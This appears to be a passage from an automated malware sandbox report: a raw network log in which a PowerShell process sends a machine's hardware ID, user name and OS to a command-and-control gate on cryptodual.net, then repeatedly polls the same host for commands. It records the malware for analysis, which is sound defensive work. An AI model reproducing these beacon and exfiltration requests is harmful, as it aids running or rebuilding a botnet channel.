                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1BedpwdqxV%2F7KQhtoqfMh5Zt8mmYokZkgu8jteiprRWdKR3pBReAHpLA6reJ%2BGwEs%2Ft%2FYNEA%2BvZkgt%2FA%2FWJtm%2F6mRvs2EzW1umvwbXZL2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f53b3899d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:42.963814974 CET1398OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:43.050457001 CET1399INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:43 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703799590000d6d96f2bd000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=iywNrTeI7sxR7OQGUPHAk0ZpTleY2dzTA8E%2By2zVCFLG1X9Ejr24dO3i4MdUdlQlbcdsypCv%2F6O2o0lemFUxCSdLvqMvpqoqXIDanyZOHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f53bc9cad6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                2192.168.2.2249172172.67.167.12280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 4, 2021 19:17:03.754157066 CET1333OUTPOST /cc/gate.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: http generic
                                                                Host: cryptodual.net
                                                                Content-Length: 87
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Data Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c
                                                                Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional
                                                                Jan 4, 2021 19:17:04.564491987 CET1335INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703700320000c7791b2e2000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Cz7EWrbN9xQh4kps12fPCRFQ3osexibxcm6zR3xWr1EwKek4CEkcp8zXuVQHHw6QvLizC5vQtj0jgHGK7dTr0b9XGHRk%2Fc7%2BdtH%2BtQ6A9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f446b912c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:04.565768003 CET1335OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:04.693449020 CET1337INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703703590000c77922830000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=78Z5%2BwNS7NkCmclhiI7zPw2XGlmibN1X7QoeuGNpRt18SNfjpSv%2FhfabQLYg1%2BBxfu%2FMAmV%2FLpSBVGBFfc5sYU6lIAyO7OFEOfxBWtJ%2Biw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f44bcba9c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:04.694196939 CET1337OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:04.790327072 CET1339INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703703da0000c77935ba1000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=8g8rxMEiuQ9tea3a6f07WDlalZ8qSX8XpMMcdymkxvS%2B20r6wVhopeguxCp7RXMUXEo%2BSPwPxTsRpJvZAk1oxn1%2FiszNSmfBAByQTq3OMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f44c9dbec779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:04.791111946 CET1339OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:04.888597012 CET1341INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077037043b0000c77973234000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=VwtpS0as2n8ynSy2FCCAZNIdrplz9oqmyu1GyexDcsxu%2FdM9sZQDDCfWuyW7n3rS6usJenO4wPrYMvcZo%2FHMv30bI68WdSeN03TQamZZcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f44d2ef8c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:04.889750957 CET1341OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:04.957537889 CET1342INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077037049d0000c77923094000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zjam79sGZYn1izs18lV8j1DWwd5S5m0P0MWGsKSp27b2T1X%2FYYzcxUW4Y9splBZQfye8hYbkI%2Boxzltu0h3vsO%2BR95jTq3dnROp6J%2B1pEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f44dc85cc779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:09.952816010 CET1343OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:10.014244080 CET1345INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703718640000c7793d174000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9TAFY%2FSbMRHEesT%2FfHI8u%2BbecPJae%2Bk7mfxqzpmsIqLtjaGsAS%2FsfjbYZSsEBQ0AADynP8AYV1H51hiEVyKSOyCO21B5VgbBy8IB4xObnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f46d6b94c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:10.015170097 CET1345OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:10.085484028 CET1347INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703718a40000c779383cf000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Fj%2B7Z2HN6bffQZUS0mg5dM%2FBmkFKGYbQC2lPrsXOnMkCNL78DaCMIm5J9gT0hfp2a0V9H1u1hv0uJqgFvLcxso45md2emEJXAxO%2BpzVNCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f46ddc58c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:10.086371899 CET1347OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:10.154727936 CET1349INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703718eb0000c77948a53000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=qMNAta6Oht%2FrLDycc3mepwYh5YPGZrC%2Fk%2Bq4sNXezsYcP0%2ByeUAsD7qpjFlv15Flti%2BXJJnPiirHZo4ta%2BoaxIlGvaXB9nhT8joUwJ%2BCNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f46e4d4dc779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:10.155527115 CET1349OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:10.224998951 CET1350INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077037192f0000c7795d3ed000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=KwtLrO5l1f5FXbedMUUNfpSaunC03AjKEc%2Fo7vMjhDd0E0NHd%2B7Kvd7WQyGLjjydiuYVMAuxWznHmKOqXY22OaSBS9lKwPlM4hVPLJ%2BwWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f46ebe1ac779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:15.225049973 CET1350OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:15.295845985 CET1352INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770372cff0000c77984837000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=QkU%2BTqYc0pwT7xzyOtrjCpThm3e0GxCbIjXryfdnR8WqgMqhHptrSwRLMZd0M13gNyJmk0%2BOAWu4VwwJG7rVhsK7cW3c%2B5trN1XxFY8l2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f48e6f75c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:15.296494961 CET1352OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:15.366817951 CET1354INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770372d440000c779292c4000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LfAMS52yt9aunMABIy6xDZvLdSjFg4UW54%2B3KcQLRFg3RqrajDKgaKnRQOa05xIgYBhtwDg0id%2Bl0AiNbpq%2BZbfIRcxCcXQJM1DbpVQEBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f48ed832c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:15.367356062 CET1354OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:15.429128885 CET1356INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770372d8b0000c77938185000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Bvyug64DinJR3k8%2FV6zPCYgZpCaMH3v0CP0BIYZTtBLEvootvRy%2BO%2Bxum948rr1WkPHdm7P%2FvSAYgM26e%2BhLouxB00igdwIWydYoXZgE3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f48f48ffc779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:15.429739952 CET1356OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:15.504028082 CET1357INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770372dcc0000c77981820000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cCBZ0ZhIfMiy9RSUyjZ%2FmVsZ5JS1yoUwFTZJQBtpyccaoi1cwwKsWT9NmeskCzlcgbMoxJW%2BOZ6QdHPnv8a3fHAiAb%2F%2FE1yjzxzOeqNHbw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f48fa9b2c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:20.499825954 CET1358OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:20.593302965 CET1359INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703741980000c77961194000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ZFIfVIoDJaEr%2B9F%2B0%2F4CynER1iKMIHfvx1IebVTnEM1kn3g6Wwup6SZKIN%2F6ikhBVrnEXb7FY1VM3IpsWzXvzuxgIoLDyDvUbn%2Bh8r%2Fq6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4af5beec779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:20.594125986 CET1359OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:20.655513048 CET1361INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703741f70000c77931245000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=APeIdhXRZy1KaNAj5RXYe%2Fi9NM%2FC7DxeS1kgg%2FGobAKIbJ2CkGkLgW%2FeCsCu1ZtSbgV1ZMiKVvQsGw5gJYo5Xd1PkI0%2FwQolQ%2Fd1hscwtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4afed3cc779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:20.656460047 CET1362OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:20.718929052 CET1363INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703742350000c77963bb5000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Fnsuv5ri7ZUTyU0BvjtSHBrjaun2CUUzheXOUcDuXrr%2BRjIiw0ewWuErs5HoCiyVcxc829%2FdcUq%2Bcm0v1gvoY5HS1PrYWvMkPyFu04Ak7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4b05e10c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:20.719814062 CET1364OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:20.784519911 CET1365INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703742740000c77922929000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=v9A6ewaY2Kqstfrzv%2FEP4Fb1gCiLb7WTl%2BWMYrbf%2FBvwIMDtpEK9rBPSU9keRpl1OIZlJJh2j7OP4GgOXyX4Hxv1oxD%2FziUu2uzMFCMT6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4b0bf0ec779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:25.787287951 CET1366OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:25.867825031 CET1367INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077037563f0000c77941986000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=U%2B8CiPZZ7uif5Wr9XjmO9Y5RIoNKfycWsHhj10iLKH105Vn%2B8nJVqvg8Z7f%2FvvVDJngdFJ5KsZ9Br2TJGjp5vdulX4zBghSKjm%2B3Ao7QUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4d06fa6c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:25.868453026 CET1367OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:25.931865931 CET1368INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703756910000c7792aa98000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=88NnaDftzlWxxCoYAZ0BMk1T8P0tGNLEzguUtXQth7p5JS0jGTSCp87ag9IB%2BAhs4giBtXgCLtF%2BzIKsZIgLdLCmiK4rYdmSENrisYU6Lw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4d0e8c4c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:25.932638884 CET1369OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:25.993691921 CET1370INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703756d10000c7795d110000000001
